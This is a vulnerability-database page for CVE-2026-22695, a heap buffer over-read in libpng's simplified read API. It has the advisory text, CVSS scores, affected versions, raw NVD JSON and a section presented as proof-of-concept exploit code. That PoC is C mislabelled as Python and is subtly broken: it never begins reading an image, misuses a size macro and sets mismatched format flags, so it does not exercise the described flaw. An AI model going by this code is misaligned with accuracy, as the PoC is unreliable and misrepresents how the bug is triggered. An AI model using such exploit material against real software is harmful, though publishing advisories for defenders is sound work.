Security Vulnerability Report
中文
CVE-2026-22695 CVSS 6.1 MEDIUM

CVE-2026-22695

Published: 2026-01-12 23:15:53
Last Modified: 2026-01-21 18:58:56
Source: [email protected]

Description

LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From 1.6.51 to 1.6.53, there is a heap buffer over-read in the libpng simplified API function png_image_finish_read when processing interlaced 16-bit PNGs with 8-bit output format and non-minimal row stride. This is a regression introduced by the fix for CVE-2025-65018. This vulnerability is fixed in 1.6.54.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:libpng:libpng:*:*:*:*:*:*:*:* - VULNERABLE
libpng < 1.6.51
libpng 1.6.51
libpng 1.6.52
libpng 1.6.53

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#include <stdio.h> #include <stdlib.h> #include <png.h> #include <string.h> // PoC for CVE-2026-22695: Heap buffer over-read in png_image_finish_read // This PoC demonstrates the vulnerability with a crafted interlaced 16-bit PNG int main() { png_image image; memset(&image, 0, sizeof(image)); image.version = PNG_IMAGE_VERSION; // Initialize for a 16-bit interlaced PNG with 8-bit output image.width = 1024; image.height = 1024; image.format = PNG_FORMAT_FLAG_LINEAR | PNG_FORMAT_FLAG_INTERLACED; // Allocate output buffer with minimal row stride (incorrect for this case) png_bytep buffer = (png_bytep)malloc(PNG_IMAGE_DATA_SIZE); if (!buffer) return 1; // This call can trigger heap buffer over-read due to non-minimal row stride // when processing interlaced 16-bit PNGs with 8-bit output if (png_image_finish_read(&image, NULL, buffer, 0, NULL)) { printf("Image read successfully\n"); } else { printf("Failed to read image: %s\n", image.message); } free(buffer); return 0; } /* * To trigger the vulnerability: * 1. Create a crafted interlaced PNG with 16-bit color depth * 2. Ensure the row stride is non-minimal (e.g., row bytes > width * bytes_per_pixel) * 3. Open the file using an application that uses libpng's simplified API * 4. The application will attempt to read beyond allocated buffer bounds */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22695", "sourceIdentifier": "[email protected]", "published": "2026-01-12T23:15:52.597", "lastModified": "2026-01-21T18:58:55.787", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From 1.6.51 to 1.6.53, there is a heap buffer over-read in the libpng simplified API function png_image_finish_read when processing interlaced 16-bit PNGs with 8-bit output format and non-minimal row stride. This is a regression introduced by the fix for CVE-2025-65018. This vulnerability is fixed in 1.6.54."}, {"lang": "es", "value": "LIBPNG es una biblioteca de referencia para su uso en aplicaciones que leen, crean y manipulan archivos de imagen ráster PNG (Portable Network Graphics). Desde 1.6.51 hasta 1.6.53, existe una lectura excesiva de búfer de pila en la función API simplificada de libpng png_image_finish_read al procesar PNGs entrelazados de 16 bits con formato de salida de 8 bits y un paso de fila no mínimo. Esto es una regresión introducida por la corrección para CVE-2025-65018. Esta vulnerabilidad está corregida en 1.6.54."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libpng:libpng:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.6.51", "versionEndExcluding": "1.6.54", "matchCriteriaId": "6A911B80-087A-4AA8-8AC7-EC6B45CB616F"}]}]}], "references": [{"url": "https://github.com/pnggroup/libpng/commit/218612ddd6b17944e21eda56caf8b4bf7779d1ea", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/pnggroup/libpng/commit/e4f7ad4ea2", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/pnggroup/libpng/issues/778", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-mmq5-27w3-rxpp", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.